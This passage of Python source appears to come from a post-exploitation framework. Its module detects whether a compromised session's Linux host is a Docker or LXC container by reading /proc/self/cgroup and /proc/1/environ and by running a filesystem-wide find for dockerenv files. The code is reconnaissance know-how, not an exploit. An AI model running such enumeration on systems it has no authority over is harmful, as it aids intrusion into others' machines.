        super().__init__(source=source, types=["system.container"])

        self.system: str = system
        """ what type of container? either docker or lxd """

    def title(self, session):
        return f"[yellow]{self.system}[/yellow]"


class Module(EnumerateModule):
    """
    Check if this system is inside a container
    :return:
    """

    PROVIDES = ["system.container"]
    PLATFORM = [Linux]

    def enumerate(self, session):

        try:
            with session.platform.open("/proc/self/cgroup", "r") as filp:
                if "docker" in filp.read().lower():
                    yield ContainerData(self.name, "docker")
                    return
        except (FileNotFoundError, PermissionError):
            pass

        try:
            proc = session.platform.run(
                'find / -maxdepth 3 -name "*dockerenv*" -exec ls -la {{}} \\; 2>/dev/null',
                capture_output=True,
                text=True,
            )

            if proc.stdout:
                if proc.stdout.strip() != "":
                    yield ContainerData(self.name, "docker")
                    return

        except CalledProcessError:
            # We couldn't read in from a .dockerenv file
            pass

        try:
            with session.platform.open("/proc/1/environ", "r") as filp:
                if "container=lxc" in filp.read().lower():
                    yield ContainerData(self.name, "lxc")
                    return
        except (FileNotFoundError, PermissionError):
            pass
